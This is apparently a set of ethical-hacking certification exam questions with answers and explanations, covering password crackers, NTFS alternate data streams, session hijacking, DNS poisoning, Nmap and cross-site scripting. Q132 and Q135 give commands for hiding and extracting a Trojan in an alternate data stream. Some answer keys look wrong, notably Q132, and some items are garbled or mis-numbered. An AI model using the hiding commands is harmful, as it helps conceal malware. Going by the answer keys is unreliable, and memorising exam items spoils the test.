Q131. Which of the following are well know password-cracking programs?(Choose all that apply. 

A. L0phtcrack 

B. NetCat 

C. Jack the Ripper 

D. Netbus 

E. John the Ripper 

Answer: AE

Explanation: L0phtcrack and John the Ripper are two well know password-cracking programs. Netcat is considered the Swiss-army knife of hacking tools, but is not used for password cracking 


Q132. ou have hidden a Trojan file virus.exe inside another file readme.txt using NTFS streaming. 

Which command would you execute to extract the Trojan to a standalone file? 

A. c:> type readme.txt:virus.exe > virus.exe 

B. c:> more readme.txt | virus.exe > virus.exe 

C. c:> cat readme.txt:virus.exe > virus.exe 

D. c:> list redme.txt$virus.exe > virus.exe 

Answer: C

Explanation: cat will concatenate, or write, the alternate data stream to its own file named virus.exe 


Q133. Bob, an Administrator at company was furious when he discovered that his buddy Trent, has launched a session hijack attack against his network, and sniffed on his communication, including administrative tasks suck as configuring routers, firewalls, IDS, via Telnet. 

Bob, being an unhappy administrator, seeks your help to assist him in ensuring that attackers such as Trent will not be able to launch a session hijack in company. 

Based on the above scenario, please choose which would be your corrective measurement actions (Choose two) 

A. Use encrypted protocols, like those found in the OpenSSH suite. 

B. Implement FAT32 filesystem for faster indexing and improved performance. 

C. Configure the appropriate spoof rules on gateways (internal and external). 

D. Monitor for CRP caches, by using IDS products. 

Answer: AC

Explanation: First you should encrypt the data passed between the parties; in particular the session key. This technique is widely relied-upon by web-based banks and other e-commerce services, because it completely prevents sniffing-style attacks. However, it could still be possible to perform some other kind of session hijack. By configuring the appropriate spoof rules you prevent the attacker from using the same IP address as the victim as thus you can implement secondary check to see that the IP does not change in the middle of the session. 


Q134. Data is sent over the network as clear text (unencrypted) when Basic Authentication is configured on Web Servers. 

A. True 

B. False 

Answer: A

Explanation: Using HTTP basic authentication will result in your password being sent over the internet as clear text. Don't use this technique unless you understand what the ramifications of this are. 


Q135. What file system vulnerability does the following command take advantage of? 

type c:anyfile.exe > c:winntsystem32calc.exe:anyfile.exe 

A. HFS 

B. ADS 

C. NTFS 

D. Backdoor access 

Answer: B

Explanation: ADS (or Alternate Data Streams) is a “feature” in the NTFS file system that makes it possible to hide information in alternate data streams in existing files. The file can have multiple data streams and the data streams are accessed by filename:stream. 


Q136. An SNMP scanner is a program that sends SNMP requests to multiple IP addresses, trying different community strings and waiting for a reply. Unfortunately SNMP servers don't respond to requests with invalid community strings and the underlying protocol does not reliably report closed ports. This means that 'no response' from the probed IP address can mean which of the following: 

(Select up to 3) 

A. Invalid community string 

B. S-AUTH protocol is running on the SNMP server 

C. Machine unreachable 

D. SNMP server not running 

Answer: ACD

Explanation: http://en.wikipedia.org/wiki/Simple_Network_Management_Protocol 


Q137. Joseph was the Web site administrator for the Mason Insurance in New York, who's main Web site was located at www.masonins.com. Joseph uses his laptop computer regularly to administer the Web site. One night, Joseph received an urgent phone call from his friend, Smith. According to Smith, the main Mason Insurance web site had been vandalized! All of its normal content was removed and replaced with an attacker's message ''Hacker Message: You are dead! Freaks!'' 

From his office, which was directly connected to Mason Insurance's internal network, Joseph surfed to the Web site using his laptop. In his browser, the Web site looked completely intact. No changes were apparent. Joseph called a friend of his at his home to help troubleshoot the problem. The Web site appeared defaced when his friend visited using his DSL connection. So, while Smith and his friend could see the defaced page, Joseph saw the intact Mason Insurance web site. To help make sense of this problem, Joseph decided to access the Web site using his dial-up ISP. He disconnected his laptop from the corporate internal network and used his modem to dial up the same ISP used by Smith. After his modem connected, he quickly typed www.masonins.com in his browser to reveal the following web page: 

H@cker Mess@ge: 

Y0u @re De@d! Fre@ks! 

After seeing the defaced Web site, he disconnected his dial-up line, reconnected to the internal network, and used Secure Shell (SSH) to log in directly to the Web server. He ran Tripwire against the entire Web site, and determined that every system file and all the Web content on the server were intact. 

How did the attacker accomplish this hack? 

A. ARP spoofing 

B. SQL injection 

C. DNS poisoning 

D. Routing table injection 

Answer: C

Explanation: External calls for the Web site has been redirected to another server by a successful DNS poisoning. 


Q138. When Nmap performs a ping sweep, which of the following sets of requests does it send to the target device? 

A. ICMP ECHO_REQUEST & TCP SYN 

B. ICMP ECHO_REQUEST & TCP ACK 

C. ICMP ECHO_REPLY & TFP RST 

D. ICMP ECHO_REPLY & TCP FIN 

Answer: B

Explanation: The default behavior of NMAP is to do both an ICMP ping sweep (the usual kind of ping) and a TCP port 80 ACK ping sweep. If an admin is logging these this will be fairly characteristic of NMAP. 


Q139. You just purchased the latest DELL computer, which comes pre-installed with Windows XP, McAfee antivirus software and a host of other applications. You want to connect Ethernet wire to your cable modem and start using the computer immediately. 

Windows is dangerously insecure when unpacked from the box, and there are a few things that you must do before you use it. 

A. New Installation of Windows Should be patched by installation the latest service packs and hotfixes 

B. Enable “guest” account 

C. Install a personal firewall and lock down unused ports from connecting to your computer 

D. Install the latest signatures for Antivirus software 

E. Configure “Windows Update” to automatic 

F. Create a non-admin user with a complex password and login to this account 

Answer: ACDEF

Explanation: The guest account is a possible vulnerability to your system so you should not enable it unless needed. Otherwise you should perform all other actions mentioned in order to have a secure system. 

Topic 23, Mixed Questions 

566. One of the better features of NetWare is the use of packet signature that includes cryptographic signatures. The packet signature mechanism has four levels from 0 to 3. 

In the list below which of the choices represent the level that forces NetWare to sign all packets? 

A. 0 (zero) 

B. 1 

C. 2 

D. 3 

Answer: D

Explanation: 0Server does not sign packets (regardless of the client level). 

1Server signs packets if the client is capable of signing (client level is 2 or higher). 

2Server signs packets if the client is capable of signing (client level is 1 or higher). 

3Server signs packets and requires all clients to sign packets or logging in will fail. 


Q140. Kevin sends an email invite to Chris to visit a forum for security professionals. Chris clicks on the link in the email message and is taken to a web based bulletin board. Unknown to Chris, certain functions are executed on his local system under his privileges, which allow Kevin access to information used on the BBS. However, no executables are downloaded and run on the local system. What would you term this attack? 

A. Phishing 

B. Denial of Service 

C. Cross Site Scripting 

D. Backdoor installation 

Answer: C

Explanation: This is a typical Type-1 Cross Site Scripting attack. This kind of cross-site scripting hole is also referred to as a non-persistent or reflected vulnerability, and is by far the most common type. These holes show up when data provided by a web client is used immediately by server-side scripts to generate a page of results for that user. If unvalidated user-supplied data is included in the resulting page without HTML encoding, this will allow client-side code to be injected into the dynamic page. A classic example of this is in site search engines: if one searches for a string which includes some HTML special characters, often the search string will be redisplayed on the result page to indicate what was searched for, or will at least include the search terms in the text box for easier editing. If all occurrences of the search terms are not HTML entity encoded, an XSS hole will result.